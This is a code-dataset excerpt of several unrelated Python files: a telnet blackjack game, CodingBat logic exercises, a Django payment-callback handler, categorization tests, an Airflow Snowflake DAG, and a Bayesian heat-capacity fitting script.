pot.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telse:\t\n\t\t\t\t\tclient_print(\"Not quite kid\")\n\t\t\t\t\tclient_print(\"you lost\")\n\t\t\t\t\tclient_print(playertotalbet)\n\t\t\t\t\tmoney = int(money) - int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\t\tcpumoney += int(pot)\n\t\t\telif self.check_hand(hand) > self.check_hand(cpuhand):\n\t\t\t\tif cpufold == True:\n\t\t\t\t\tclient_print(\"Just glad I didn't lose more.\")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\telif self.check_hand(hand) > 21:\n\t\t\t\t\tclient_print(\"You're bust kid. better luck next time.\")\n\t\t\t\t\tclient_print(\"you lost\")\n\t\t\t\t\tclient_print(playertotalbet)\n\t\t\t\t\tmoney = int(money) - int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpumatch)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\t\t\tcpumoney += int(pot)\n\t\t\t\telse:\n\t\t\t\t\tclient_print(\"You win kid. 
Good Job.\")\n\t\t\t\t\tclient_print(\"Your winnings, \")\n\t\t\t\t\tclient_print(pot)\n\t\t\t\t\tmoney += int(pot)\n\t\t\t\t\tmoney -= int(playertotalbet)\n\t\t\t\t\tcpumoney -= int(cpuraise)\n\t\t\t\t\tcpumoney -= int(cpubet)\n\t\t\telif self.check_hand(hand) == self.check_hand(cpuhand):\n\t\t\t\tclient_print(\"That's what's known as a \\\"push\\\", son.\")\n\t\t\t\t\n\t\t\tclient_print(\"I've got this much money left:\")\n\t\t\tclient_print(money)\n\t\t\tclient_print(\"He has this much money left: \")\n\t\t\tclient_print(cpumoney)\n\t\t\tif money < 0:\n\t\t\t\tclient_print(\"You've lost it all Kid, just give up already.\")\n\t\t\t\tGame_Over = True\n\t\t\tif cpumoney < 0:\n\t\t\t\tclient_print(\"Well, I guess that wasn't luck I was feeling. You've bled me dry, nice work, kid.\")\n\t\t\t\n\t\t\t\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n\t \n telnet_server = TelnetServer(\n port=8089,\n address='',\n on_connect=on_connect,\n on_disconnect=on_disconnect,\n timeout = .05\n ) \n logging.info(\"Listening for connections on port {}. CTRL-C to break.\".format(telnet_server.port))\n while SERVER_RUN:\n telnet_server.poll() # Send, Recv, and look for new connections\n kick_idle() # Check for idle clients\n process_clients() # Check for client input\n\n logging.info(\"Server shutdown.\")\n \n\n\n\t\n\t\n","sub_path":"Blackjacktelnet experiment.py","file_name":"Blackjacktelnet experiment.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454483792","text":"#make_bricks\r\ndef make_bricks(small, big, goal):\r\n return goal%5 >= 0 and goal%5 - small <= 0 and small + 5*big >= goal\r\n\r\n#lone_sum\r\ndef lone_sum(a, b, c):\r\n if a==b==c:\r\n return 0\r\n if a==b:\r\n return c\r\n if c==b:\r\n return a\r\n if a==c:\r\n return b\r\n return a+b+c\r\n\r\n#lucky_sum\r\ndef lucky_sum(a, b, c):\r\n if a==13:\r\n a=0\r\n b=0\r\n c=0\r\n if b==13:\r\n b=0\r\n c=0\r\n if c==13:\r\n c=0\r\n sum = a+b+c\r\n return sum\r\n\r\n#no_teen_sum\r\ndef no_teen_sum(a, b, c):\r\n a = fix_teen(a)\r\n b = fix_teen(b)\r\n c = fix_teen(c)\r\n sum = a+b+c\r\n return sum\r\n \r\n \r\ndef fix_teen(n):\r\n if n==15 or n==16:\r\n return n\r\n elif n>=10:\r\n return 0\r\n else:\r\n return n\r\n\r\n#round_sum\r\ndef round_sum(a, b, c):\r\n a = round10(a)\r\n b = round10(b)\r\n c = round10(c)\r\n return a+b+c\r\n \r\ndef round10(num):\r\n if num%10>=5:\r\n num+=(10-(num%10))\r\n else:\r\n num-=(num%10)\r\n return num\r\n\r\n#close_far\r\ndef close_far(a, b, c):\r\n arr = [a,b,c]\r\n arr.sort()\r\n maxi = arr[2]\r\n mini = arr[0]\r\n mid = arr[1]\r\n if (maxi-mid<2 and mid-mini<2):\r\n return False\r\n if (maxi-mid<2 and maxi-mini>=2) or (mid-mini<2 and maxi-mini>=2):\r\n return True\r\n return False\r\n\r\n#make_chocolate\r\ndef make_chocolate(small, big, goal):\r\n maxBig = goal / 5\r\n \r\n if big >= maxBig:\r\n if small >= (goal - maxBig * 5):\r\n return goal - maxBig * 5\r\n if big < maxBig:\r\n if small >= (goal - big * 5):\r\n return goal - big * 5\r\n return -1\r\n\r\n","sub_path":"week8/coding_bat/logic-2.py","file_name":"logic-2.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"262520118","text":"# -*- encoding: utf-8 -*- \r\n\r\nimport traceback\r\nimport os\r\nimport time\r\nimport datetime\r\nimport random\r\nfrom base64 import b64decode\r\nfrom M2Crypto import RSA\r\nfrom apps.common import 
utils\r\nfrom django.http import HttpResponse\r\nfrom rklib.utils import rkjson as json\r\nfrom rklib.model import storage_context\r\nfrom apps.common.decorators import needuser,session_auth,signature_auth\r\nfrom apps.models.pp_charge import PPCharge\r\nfrom apps.models.account_mapping import AccountMapping\r\nfrom apps.models.charge_record import ChargeRecord\r\nfrom apps.models.user_property_ex import UserPropertyEx\r\nfrom apps.models.redistop import TopModel\r\nfrom apps.models.user_base import UserBase\r\nfrom apps.config import game_config\r\nfrom apps.common.ocstat import oc_stat\r\nfrom apps.views.main import charge_api\r\n\r\ng_rsa_foo = None\r\n \r\n@signature_auth\r\n@session_auth\r\n@needuser\r\ndef generate_billno(request):\r\n    #\"\"\"generate an order number\r\n    #\"\"\"\r\n    data = {}\r\n    item_id = request.REQUEST['item_id']\r\n    pp_charge_obj = PPCharge.get_instance(request.rk_user.uid)\r\n    #drop unredeemed orders that expired more than 10 days ago\r\n    charge_keys = pp_charge_obj.charge_info['charge_record'].keys()\r\n    billnos = []\r\n    now = datetime.datetime.now()\r\n    for i in charge_keys:\r\n        if pp_charge_obj.charge_info['charge_record'][i][1] is False:\r\n            billnos.append(i)\r\n    for i in billnos:\r\n        bill_date = pp_charge_obj.charge_info['charge_record'][i][2]\r\n        if bill_date + datetime.timedelta(days = 10) < now:\r\n            pp_charge_obj.charge_info['charge_record'].pop(i)\r\n    \r\n    billno = 'pp'+ str(request.rk_user.uid) + str(time.time()) + str(random.randint(1000,9999))\r\n    pp_charge_obj.charge_info['charge_record'][billno] = [item_id, False, datetime.datetime.now()]\r\n    pp_charge_obj.put()\r\n    \r\n    data['billno'] = billno\r\n    data['user_info'] = request.rk_user.wrapper_info()\r\n    return HttpResponse(\r\n        json.dumps(data, indent=1),\r\n        content_type='application/x-javascript',\r\n    )\r\n    \r\n    \r\ndef decode_pp_callback(data):\r\n    \r\n    global g_rsa_foo\r\n    try:\r\n        b64string = b64decode(data)\r\n        if not g_rsa_foo:\r\n            pem_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'pprsa.pem'))\r\n            g_rsa_foo = RSA.load_pub_key(pem_file)\r\n        \r\n        ctxt = g_rsa_foo.public_decrypt(b64string, RSA.pkcs1_padding)\r\n        return 0,json.loads(ctxt)\r\n    except:\r\n        return 1,{}\r\n    \r\ndef ppcharge_result(request):\r\n    #\"\"\"PP Assistant recharge callback\r\n    #\"\"\"\r\n    status = int(request.REQUEST['status'])\r\n    \r\n    #already redeemed\r\n    if status == 1:\r\n        return HttpResponse('success')\r\n    \r\n    #order signature verification failed\r\n    sign = request.REQUEST['sign']\r\n    rc, pp_sign = decode_pp_callback(sign) \r\n    if rc or pp_sign == {}:\r\n        content = 'pp charge error'\r\n        utils.oc_send_mail(request, content)\r\n        return HttpResponse('fail')\r\n    \r\n    #has this order already been processed?\r\n    billno = pp_sign['billno']\r\n    charge_record_obj = ChargeRecord.get(billno)\r\n    if charge_record_obj is not None:\r\n        return HttpResponse('success') \r\n    \r\n    #does the order belong to a valid player?\r\n    pid = pp_sign['roleid']\r\n    account_mapping_obj = AccountMapping.get(pid)\r\n    if account_mapping_obj is None:\r\n        return HttpResponse('fail') \r\n    pp_charge_obj = PPCharge.get(account_mapping_obj.uid)\r\n    if pp_charge_obj is None:\r\n        return HttpResponse('fail') \r\n    \r\n    #does this order belong to this player?\r\n    if billno not in pp_charge_obj.charge_info['charge_record']:\r\n        return HttpResponse('fail') \r\n    \r\n    bill_info = pp_charge_obj.charge_info['charge_record'][billno]\r\n    if bill_info[1] is True:\r\n        return HttpResponse('success')\r\n    \r\n    #gold ingots (premium currency)\r\n    item_id = bill_info[0]\r\n    oid = pp_sign['billno']\r\n\r\n    rk_user = UserBase.get(account_mapping_obj.uid)\r\n    data = charge_api(request, rk_user, oid, item_id, {\"pp_sign\": pp_sign, \"status\": 0})\r\n#    rc = charge_api(account_mapping_obj.uid, item_id, 
pp_sign)\r\n if data[\"rc\"] == 0:\r\n pp_charge_obj.charge_info['charge_record'][billno][1] = True\r\n pp_charge_obj.do_put()\r\n return HttpResponse('success')\r\n else:\r\n return HttpResponse('fail')\r\n","sub_path":"python/project/card/my_card/apps/views/ppcharge.py","file_name":"ppcharge.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474621297","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n#from __future__ import unicode_literals\n\nimport os.path\nfrom unittest import SkipTest\n\nimport numpy as np\nfrom numpy.testing import assert_allclose, assert_equal\n\nimport pytest\nimport itertools\n\nfrom freediscovery.text import FeatureVectorizer\nfrom freediscovery.categorization import Categorizer\nfrom freediscovery.io import parse_ground_truth_file\nfrom freediscovery.utils import classification_score\nfrom freediscovery.exceptions import OptionalDependencyMissing\nfrom .run_suite import check_cache\n\n\nbasename = os.path.dirname(__file__)\n\n\ncache_dir = check_cache()\n\n\ndata_dir = os.path.join(basename, \"..\", \"data\", \"ds_001\", \"raw\")\n\nn_features = 20000\n\nfe = FeatureVectorizer(cache_dir=cache_dir)\nuuid = fe.preprocess(data_dir, file_pattern='.*\\d.txt', n_features=n_features,\n binary=True, use_idf=False, norm=None)\nuuid, filenames = fe.transform()\n\nground_truth = parse_ground_truth_file(\n os.path.join(data_dir, \"..\", \"ground_truth_file.txt\"))\n\n@pytest.mark.parametrize('method, cv', itertools.product(\n [\"LinearSVC\", \"LogisticRegression\", 'xgboost'],\n #'MLPClassifier', 'ensemble-stacking' not supported in production the moment\n [None, 'fast']))\ndef test_categorization(method, cv):\n\n if 'CIRCLECI' in os.environ and cv == 'fast' and method in ['LinearSVC', 'xgboost']:\n raise SkipTest # Circle CI is too slow and timesout\n\n if method == 'xgboost':\n try:\n import xgboost\n except ImportError:\n raise SkipTest\n\n cat = Categorizer(cache_dir=cache_dir, dsid=uuid, cv_n_folds=2)\n mask = ground_truth.is_relevant.values == 1\n \n try:\n coefs, X_train, Y_train = cat.train(\n ground_truth.index.values[mask],\n ground_truth.index.values[~mask],\n method=method,\n cv=cv)\n except OptionalDependencyMissing:\n raise SkipTest\n\n\n Y_pred = cat.predict()\n X_pred = cat.fe._pars['filenames']\n\n scores = classification_score(ground_truth.index.values,\n ground_truth.is_relevant.values,\n X_pred, Y_pred)\n\n assert cat.get_params() is not None\n\n if method in ['xgboost', 'ensemble-stacking']:\n # this parameter fail for some reason so far...\n return\n assert_allclose(scores['precision'], 1, rtol=0.5)\n assert_allclose(scores['recall'], 1, rtol=0.5)\n assert_equal(cat.get_dsid(cache_dir, cat.mid), uuid )\n cat.delete()\n\n\ndef test_unique_label():\n \"\"\"Check that testing works with only one label in the training test\"\"\"\n np.random.seed(10)\n Nshape = ground_truth.index.values.shape\n is_relevant = np.zeros(Nshape).astype(int)\n scores = classification_score(ground_truth.index.values,\n is_relevant,\n ground_truth.index.values,\n np.random.rand(*Nshape))\n # TODO unused variable 'scores'\n\n\ndef test_ensemble_stacking():\n from sklearn.linear_model import LogisticRegression\n try:\n from freediscovery_extra import _EnsembleStacking\n except ImportError:\n raise SkipTest\n\n st = _EnsembleStacking([('m1', LogisticRegression()), ('m2', 
LogisticRegression())])\n\n    X_train = np.random.randn(100, 5)\n    Y_train = np.random.randint(2, size=(100))\n    X_test = np.random.randn(20, 5)\n\n    st.fit(X_train, Y_train)\n    st.predict_proba(X_test)\n\n\n","sub_path":"freediscovery/tests/test_categorize.py","file_name":"test_categorize.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"475436934","text":"import logging\n\nimport airflow\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.contrib.hooks.snowflake_hook import SnowflakeHook\nfrom airflow.contrib.operators.snowflake_operator import SnowflakeOperator\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nargs = {\"owner\": \"Airflow\", \"start_date\": airflow.utils.dates.days_ago(2)}\n\ndag = DAG(\n    dag_id=\"snowflake_connector\", default_args=args, schedule_interval=None\n)\n\ncreate_insert_query = [\n    \"\"\"create table public.test_table (amount number);\"\"\",\n    \"\"\"insert into public.test_table values(1),(2),(3);\"\"\",\n]\n\n\ndef row_count(**context):\n    dwh_hook = SnowflakeHook(snowflake_conn_id=\"snowflake_conn\")\n    result = dwh_hook.get_first(\"select count(*) from public.test_table\")\n    logging.info(\"Number of rows in `public.test_table` - %s\", result[0])\n\n\nwith dag:\n    create_insert = SnowflakeOperator(\n        task_id=\"snowflake_create\",\n        sql=create_insert_query,\n        snowflake_conn_id=\"snowflake_conn\",\n    )\n\n    get_count = PythonOperator(task_id=\"get_count\", python_callable=row_count)\ncreate_insert >> get_count\n","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"266289846","text":"# Lib\nfrom logging import NullHandler, getLogger\n# App\nfrom .files import get_sample_sheet, get_sample_sheet_s3\nfrom .processing import get_manifest, get_raw_datasets, run_pipeline, consolidate_values_for_sheet\nfrom .download import run_series, run_series_list, convert_miniml\n\n\ngetLogger(__name__).addHandler(NullHandler())\n\n\n__all__ = [\n    'get_manifest',\n    'get_raw_datasets',\n    'run_pipeline',\n    'get_sample_sheet',\n    'consolidate_values_for_sheet',\n    'run_series',\n    'run_series_list',\n    'convert_miniml'\n]\n","sub_path":"methylprep/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"540788635","text":"import matplotlib\r\nmatplotlib.use('tkagg')\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nimport pickle\r\nimport seaborn as sns\r\nimport scipy.stats as ss\r\nimport numpy as np\r\nimport core_compute as cc\r\nimport core_plot as cp\r\nfrom scipy.integrate import simps, cumtrapz\r\n\r\n\r\ndef deb_Cp(theta, T):\r\n    T = np.array(T)\r\n    T[T < 1e-70] = 1e-70\r\n    # TT: array of upper bounds (theta/T) for the integral\r\n    TT = np.array(theta)[..., None] / \\\r\n        np.array(T)[None, ...]\r\n\r\n    # nx: number of steps in x integration\r\n    nx = 100\r\n\r\n    # x: array for variable of integration\r\n    # integration will be performed along\r\n    # last axis of array\r\n    x = np.ones(list(TT.shape)+[nx]) * \\\r\n        np.linspace(0, 1, nx)[None, ...]\r\n    x *= x*TT[..., None]\r\n\r\n    R = 8.314459848 # J/mol*K\r\n    expx = np.exp(x)\r\n\r\n    # if any elements of expx are infinite or equal to 1,\r\n    # replace them with zero. 
This doesn't change the result\r\n    # of the integration and avoids numerical issues\r\n    expx[expx > 1e100] = 0\r\n    expx[expx - 1 < 1e-100] = 0\r\n\r\n    # perform the numerical integration along\r\n    # the last axis of the arrays\r\n    integrand = (x**4)*expx / (expx-1.)**2\r\n    integral = simps(y=integrand, x=x, axis=-1)\r\n\r\n    return np.squeeze(9*R*((1/TT)**3)*integral)\r\n\r\n\r\ndef feval_Cp(param, T):\r\n\r\n    theta = param[..., 0]\r\n    a_2 = param[..., 1]\r\n    a_3 = param[..., 2]\r\n    a_4 = param[..., 3]\r\n    a_5 = param[..., 4]\r\n\r\n    # R = 8.314459848 # J/mol*K\r\n    # frac = theta/T\r\n    # expf = np.exp(frac)\r\n    # lowT = 3*R*(frac**2)*(expf/(expf-1)**2)\r\n    lowT = deb_Cp(theta, T)\r\n\r\n    A = lowT + a_2*T + a_3*T**2 + a_4*T**3 + \\\r\n        a_5*T**4\r\n\r\n    return A\r\n\r\n\r\ndef feval_Cp_plt(param, T, deb):\r\n\r\n    # theta = param[..., 0, None]\r\n    a_2 = param[..., 1, None]\r\n    a_3 = param[..., 2, None]\r\n    a_4 = param[..., 3, None]\r\n    a_5 = param[..., 4, None]\r\n\r\n    \"\"\"Cp for alpha phase\"\"\"\r\n\r\n    # R = 8.314459848 # J/mol*K\r\n    # frac = theta/T\r\n    # expf = np.exp(frac)\r\n    # lowT = 3*R*(frac**2)*(expf/(expf-1)**2)\r\n    lowT = deb\r\n\r\n    A = lowT + a_2*T + a_3*T**2 + a_4*T**3 + \\\r\n        a_5*T**4\r\n\r\n    return A\r\n\r\n\r\ndef feval_H(param, T):\r\n\r\n    theta = param[..., 0, None]\r\n    a_2 = param[..., 1, None]\r\n    a_3 = param[..., 2, None]\r\n    a_4 = param[..., 3, None]\r\n    a_5 = param[..., 4, None]\r\n\r\n    \"\"\"compute the enthalpy for the alpha phase\"\"\"\r\n\r\n    # R = 8.314459848 # J/mol*K\r\n    # lowT = 3*R*theta/(np.exp(theta/T)-1.)\r\n\r\n    # add on 298.15K to T so that H_298.15 = 0 is enforced\r\n    T_ = np.array(list(T) + [298.15])\r\n    T = np.atleast_1d(T)\r\n    T_ = np.atleast_1d(T_)\r\n\r\n    thetam = np.mean(theta)\r\n\r\n    # first create equispaced temps at which to eval Cp\r\n    T_v1 = np.linspace(1e-10, thetam/8, 30)[:-1]\r\n    T_v2 = np.linspace(thetam/8, 3*thetam, 50)[:-1]\r\n    T_v3 = np.linspace(3*thetam, 2100, 20)\r\n    T_v = np.concatenate([T_v1, T_v2, T_v3])\r\n\r\n    # evaluate Debye-Cp term at equispaced points\r\n    DebCp_v = deb_Cp(theta, T_v)\r\n    # evaluate Debye-Cp term at actual temps\r\n    DebCp = deb_Cp(theta, T_)\r\n\r\n    # array for H-Debye terms\r\n    DebH = np.zeros((theta.size, T_.size))\r\n\r\n    # split it up by each temp\r\n    for ii in range(T_.size):\r\n        # identify the number of temps in T_v below the actual\r\n        # temp\r\n        idx = np.sum(T_v < T_[ii])\r\n\r\n        T__ = np.zeros((idx+1))\r\n\r\n        T__[:idx+1] = T_v[:idx+1]\r\n\r\n        DebCp_ = np.zeros((theta.size, idx+1))\r\n        DebCp_[..., :idx+1] = DebCp_v[..., :idx+1]\r\n\r\n        # last temp and Cp are for the actual temp\r\n        # of interest\r\n        T__[-1] = T_[ii]\r\n        DebCp_[..., -1] = DebCp[..., ii]\r\n\r\n        # perform numerical integration\r\n        DebH_ = np.squeeze(simps(y=DebCp_, x=T__, axis=-1))\r\n        DebH[:, ii] = DebH_\r\n\r\n    # we subtract debH at 298.15K from debH at all other temps\r\n    lowT = np.squeeze(DebH[..., :-1]) - np.squeeze(DebH[..., -1])\r\n\r\n    A = lowT + 0.5*a_2*T**2 + (1./3.)*a_3*T**3 + 0.25*a_4*T**4 + \\\r\n        0.2*a_5*T**5\r\n\r\n    return A\r\n\r\n\r\ndef feval_H_plt(param, T, deb):\r\n    a_2 = param[..., 1, None]\r\n    a_3 = param[..., 2, None]\r\n    a_4 = param[..., 3, None]\r\n    a_5 = param[..., 4, None]\r\n\r\n    \"\"\"compute the enthalpy for the alpha phase\"\"\"\r\n\r\n    # R = 8.314459848 # J/mol*K\r\n    # lowT = 3*R*theta/(np.exp(theta/T)-1.)\r\n\r\n    lowT = cumtrapz(y=deb, x=T, axis=-1, initial=0)\r\n    A = np.squeeze(lowT) + 0.5*a_2*T**2 + \\\r\n        (1./3.)*a_3*T**3 + 0.25*a_4*T**4 + \\\r\n        0.2*a_5*T**5\r\n\r\n    T298idx = 
T == 298.15\r\n A -= A[..., T298idx]\r\n\r\n return A\r\n\r\n\r\ndef likelihood(param, D):\r\n \"\"\"\r\n compute the log likelihood for a set of datapoints given\r\n a parameterization\r\n \"\"\"\r\n dA_Cp = D['At_Cp']-feval_Cp(param, D['Tt_Cp'])\r\n dA_H = D['At_H']-feval_H(param, D['Tt_H'])\r\n\r\n # obtain the hyperparameter vectors for Cp and H\r\n nhyp_H = len(D['name_list_H'])\r\n hyp_H = param[-nhyp_H:]\r\n\r\n nhyp_Cp = len(D['name_list_Cp'])\r\n hyp_Cp = param[-(nhyp_H+nhyp_Cp):-nhyp_H]\r\n\r\n if param[0] <= 0 or np.any(hyp_Cp <= 0) or np.any(hyp_H <= 0):\r\n return -np.inf\r\n\r\n hypvec_Cp = np.zeros(D['Tt_Cp'].shape)\r\n for ii in range(nhyp_Cp):\r\n hypvec_Cp[D['It_Cp'] == ii] = hyp_Cp[ii]\r\n\r\n hypvec_H = np.zeros(D['Tt_H'].shape)\r\n for ii in range(nhyp_H):\r\n hypvec_H[D['It_H'] == ii] = hyp_H[ii]\r\n\r\n dof = 2+1e-6\r\n prob_Cp = ss.t.logpdf(dA_Cp, dof, loc=0, scale=D['Et_Cp']/hypvec_Cp).sum()\r\n prob_H = ss.t.logpdf(dA_H, dof, loc=0, scale=D['Et_H']/hypvec_H).sum()\r\n prob = prob_Cp + prob_H\r\n\r\n if np.isnan(prob):\r\n return -np.inf\r\n\r\n return prob\r\n\r\n\r\ndef get_data(name_list, phase):\r\n\r\n Tt, At, Et, It = [], [], [], []\r\n\r\n \"\"\"load data from the text files\"\"\"\r\n wd = os.getcwd()\r\n os.chdir('data_process')\r\n\r\n for ii in range(len(name_list)):\r\n f = open('%s.csv' % name_list[ii], 'r')\r\n lines = list(f)\r\n f.close()\r\n for jj in range(1, len(lines)):\r\n tmp = lines[jj].split()\r\n if tmp[3] == phase:\r\n Tt += [tmp[0]]\r\n At += [tmp[1]]\r\n Et += [tmp[2]]\r\n It += [ii]\r\n\r\n Tt = np.array(Tt).astype(float)\r\n At = np.array(At).astype(float)\r\n Et = np.array(Et).astype(float)\r\n It = np.array(It).astype(int)\r\n\r\n sorting = np.argsort(Tt)\r\n Tt = Tt[sorting]\r\n At = At[sorting]\r\n Et = Et[sorting]\r\n It = It[sorting]\r\n\r\n os.chdir(wd)\r\n\r\n return Tt, At, Et, It\r\n\r\n\r\ndef WP(msg, filename):\r\n \"\"\"\r\n Summary:\r\n This function takes an input message and a filename, and appends that\r\n message to the file. 
This function also prints the message\r\n    Inputs:\r\n        msg (string): the message to write and print.\r\n        filename (string): the full name of the file to append to.\r\n    Outputs:\r\n        both prints the message and writes the message to the specified file\r\n    \"\"\"\r\n    fil = open(filename, 'a')\r\n    print(msg)\r\n    fil.write(msg)\r\n    fil.write('\\n')\r\n    fil.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    \"\"\"initialize important variables\"\"\"\r\n    sns.set(color_codes=True)\r\n    np.random.seed(1)\r\n\r\n    \"\"\"either load the trace and parameters\r\n    or compute from scratch\"\"\"\r\n    if len(sys.argv) > 1:\r\n        # load the trace and the model\r\n        with open(sys.argv[1], 'rb') as buff:\r\n            D = pickle.load(buff)\r\n\r\n    else:\r\n        # for convenience, store all important variables in dictionary\r\n        D = {}\r\n\r\n        # save the current file name\r\n        D['fname'] = sys.argv[0]\r\n\r\n        # outname is the name for plots, etc\r\n        D['outname'] = D['fname'][:-3]\r\n\r\n        # set up a log file\r\n        D['wrt_file'] = D['outname'] + '.txt'\r\n        fil = open(D['wrt_file'], 'w')\r\n        fil.close()\r\n\r\n        # name_list: list of the names of the datasets\r\n        # D['name_list'] = ['Ade1952', 'Aru1972', 'Bur1958',\r\n        #                   'Cag2008', 'Cez1974', 'Col1971',\r\n        #                   'Fie1961', 'Fil1971', 'Gol1970',\r\n        #                   'Haw1963', 'Kat1985', 'Kne1963',\r\n        #                   'Kor2005', 'McC1964', 'Mil2006S1',\r\n        #                   'Mil2006S2', 'Par2003', 'Pel1971',\r\n        #                   'Ros2001', 'Wol1957']\r\n        D['name_list_Cp'] = ['Ade1952', 'Aru1972', 'Bur1958',\r\n                             'Cez1974', 'Col1971', 'Fil1971',\r\n                             'Kne1963', 'McC1964', 'Mil2006S1',\r\n                             'Mil2006S2', 'Pel1971', 'Wol1957']\r\n        D['name_list_H'] = ['Cag2008', 'Fie1961', 'Gol1970',\r\n                            'Haw1963', 'Kat1985']\r\n        D['name_list'] = D['name_list_Cp']+D['name_list_H']\r\n        nds = len(D['name_list'])\r\n\r\n        D['phase'] = 'alpha'\r\n\r\n        data = get_data(D['name_list_Cp'], D['phase'])\r\n        D['Tt_Cp'], D['At_Cp'] = data[0], data[1]\r\n        D['Et_Cp'], D['It_Cp'] = data[2], data[3]\r\n        data = get_data(D['name_list_H'], D['phase'])\r\n        D['Tt_H'], D['At_H'] = data[0], data[1]\r\n        D['Et_H'], D['It_H'] = data[2], data[3]\r\n\r\n        D['likelihood'] = likelihood\r\n\r\n        # define the prior distributions\r\n        D['npar_model'] = 5\r\n        D['distV'] = D['npar_model']*['uniform'] + nds*['expon']\r\n\r\n        if os.path.exists(D['outname'] + '_prior.csv'):\r\n            print('prior suggestions loaded')\r\n            nxtprior = np.loadtxt(D['outname'] + '_prior.csv')\r\n            D['locV'] = list(nxtprior[0, :D['npar_model']])\r\n            D['scaleV'] = list(nxtprior[1, :D['npar_model']])\r\n        else:\r\n            D['locV'] = [0, -1e-2, -1e-4, -1e-8, -1e-11]\r\n            D['scaleV'] = [700, 2e-2, 2e-4, 2e-8, 2e-11]\r\n\r\n        D['locV'] += nds*[None]\r\n        D['scaleV'] += nds*[None]\r\n        D['cV'] = (D['npar_model']+nds)*[None]\r\n        D['dim'] = len(D['distV'])\r\n\r\n        # sampler: select a type of sampler to evaluate the posterior\r\n        # distribution\r\n        D['sampler'] = 'pymultinest'\r\n\r\n        \"\"\"set up the proper set of variable names for the problem\r\n        of interest\"\"\"\r\n        D['pname'] = ['theta', 'a_2', 'a_3', 'a_4', 'a_5']\r\n        D['pname_plt'] = ['\\\\theta', 'a_2', 'a_3', 'a_4', 'a_5']\r\n\r\n        for ii in range(nds):\r\n            D['pname'] += ['alpha_%s' % D['name_list'][ii]]\r\n            D['pname_plt'] += ['\\\\alpha_{%s}' % D['name_list'][ii]]\r\n\r\n        # print(D['pname'])\r\n\r\n        D['nparam'] = len(D['pname'])\r\n\r\n        \"\"\"run the MH algorithm to sample posterior distribution\"\"\"\r\n\r\n        if D['sampler'] == 'kombine':\r\n            D = cc.sampler_kombine(D)\r\n        elif D['sampler'] == 'emcee':\r\n            D = cc.sampler_emcee(D)\r\n        elif D['sampler'] == 'pymultinest':\r\n            D = cc.sampler_multinest(D)\r\n        
else:\r\n            print('invalid sampler selected')\r\n            sys.exit()\r\n\r\n    \"\"\"calculate rescaled errors\"\"\"\r\n    if D['sampler'] == 'pymultinest':\r\n        flattrace = D['rawtrace']\r\n\r\n    else:\r\n        \"\"\"remove the tuning samples from the raw trace\r\n        (nwalkers, nlinks, dim)\"\"\"\r\n        trace = D['rawtrace'][:, -D['nlinks']:, :]\r\n        \"\"\"obtain a flattened version of the chain\"\"\"\r\n        flattrace = trace.reshape((D['nlinks']*D['nwalkers'],\r\n                                   len(D['pname'])))\r\n\r\n    nhyp_H = len(D['name_list_H'])\r\n    hyp_H = np.mean(flattrace[:, -nhyp_H:], 0)\r\n    print(nhyp_H)\r\n    print(hyp_H.shape)\r\n\r\n    nhyp_Cp = len(D['name_list_Cp'])\r\n    hyp_Cp = np.mean(flattrace[:, -(nhyp_H+nhyp_Cp):-nhyp_H], 0)\r\n\r\n    hypvec_Cp = np.zeros(D['Tt_Cp'].shape)\r\n    for ii in range(nhyp_Cp):\r\n        hypvec_Cp[D['It_Cp'] == ii] = hyp_Cp[ii]\r\n\r\n    hypvec_H = np.zeros(D['Tt_H'].shape)\r\n    for ii in range(nhyp_H):\r\n        hypvec_H[D['It_H'] == ii] = hyp_H[ii]\r\n\r\n    D['Etr_Cp'] = D['Et_Cp']/hypvec_Cp\r\n    D['Etr_H'] = D['Et_H']/hypvec_H\r\n\r\n    # save the trace and the posterior samples\r\n    with open(D['outname'] + '.pkl', 'wb') as buff:\r\n        pickle.dump(D, buff)\r\n\r\n    \"\"\"perform post-processing and analyses on the sampled chains\"\"\"\r\n    if D['sampler'] == 'pymultinest':\r\n        flattrace = D['rawtrace']\r\n\r\n    else:\r\n\r\n        \"\"\"remove the tuning samples from the raw trace\r\n        (nwalkers, nlinks, dim)\"\"\"\r\n        trace = D['rawtrace'][:, -D['nlinks']:, :]\r\n\r\n        